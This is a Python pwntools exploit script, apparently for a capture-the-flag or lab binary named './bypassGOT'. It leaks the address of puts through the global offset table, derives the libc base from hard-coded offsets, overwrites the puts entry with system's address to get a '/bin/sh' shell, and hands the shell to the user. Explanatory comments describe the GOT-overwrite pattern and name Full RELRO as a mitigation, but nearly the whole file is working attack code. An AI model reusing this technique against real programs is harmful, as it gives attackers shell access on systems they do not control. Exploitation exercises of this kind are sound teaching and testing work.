#!/usr/bin/python

from pwn import *


# Addresses used by main().  Every value is fixed at author time: the GOT
# slot comes from the target binary and the libc offsets from one specific
# libc build, so they only hold for that exact pair of files (none of them
# is derived at runtime).

# --- referenced by main() below ---
puts_got = 0x0804C018          # address of puts's GOT slot in ./bypassGOT
offset_puts = 0x00071380       # puts relative to libc base (used to recover the base)
offset_system = 0x000456E0     # system relative to libc base

# --- declared but not referenced by main() below ---
offset___libc_start_main_ret = 0x0001F08E
offset_dup2 = 0x000F5F50
offset_read = 0x000F51B0
offset_write = 0x000F5270
offset_str_bin_sh = 0x00195108
def main() -> None:
    """Drive ./bypassGOT through the two-stage exchange this script encodes.

    Stage 1 sends a 24-byte buffer ("/bin/sh" NUL-padded) followed by the
    address of puts's GOT slot, then reads back whatever the target prints
    between the first "(" and the first ")" and interprets the first four
    bytes as the resolved address of puts inside libc (presumably the
    target prints the contents at the address it was handed; that is not
    checked here).  Stage 2 subtracts the hard-coded ``offset_puts`` to get
    the libc base, adds ``offset_system``, sends those four bytes back and
    hands the tube to the user.

    Returns nothing; results go to pwntools' log.  The libc offsets are
    assumed to match the library actually loaded by the process -- nothing
    verifies that.  From a hardening standpoint this is the classic
    GOT-overwrite pattern: a writable GOT plus a program that echoes raw
    pointers.  Full RELRO (GOT made read-only after relocation) and not
    printing addresses back to the client are the mitigations that close it.
    """
    p = process("./bypassGOT")  # local process; no remote target in this script


    # ==== stage 1: leak puts@libc ====

    # leak puts@libc
    # 24 bytes of "/bin/sh" + NUL padding, then the GOT address as 32-bit
    # little-endian (p32).  The layout is whatever the target expects;
    # the script does not explain why 24.
    stage_1 = b"/bin/sh" + b"\x00" * (24 - len("/bin/sh")) + p32(puts_got)


    data = p.recv()  # initial output (banner/prompt); the value is overwritten below without being used
    p.send(stage_1)
    data = p.recv()  # NOTE(review): a single recv() may be a partial read; if ")" has not arrived yet, find() below returns -1
    #log.info("Captured information is: %s", data)
    # find() returns -1 when a delimiter is absent; the slice below would
    # then silently produce the wrong bytes rather than fail loudly.
    left = data.find(b"(")
    right = data.find(b")")
    #log.info("left: %d, right: %d", left, right)
    data = data[left+1: right]
    log.info("leaked information is: %s", data)
    puts_libc = u32(data[:4])  # little-endian 32-bit; raises if fewer than 4 bytes were captured
    log.info("puts@libc: %x", puts_libc)

    # ==== stage 2: replace puts@libc with system@libc ====
    libc_base = puts_libc - offset_puts  # only correct if offset_puts came from the same libc build
    system_libc = libc_base + offset_system
    log.info("system@libc: %x", system_libc)
    p.send(p32(system_libc))  # raw 4-byte value; what the target does with it is not visible here



    p.interactive()  # hand stdin/stdout of the tube to the user; never returns control to this function

if __name__ == "__main__":
    # Run only when executed as a script, not when imported.
    main()
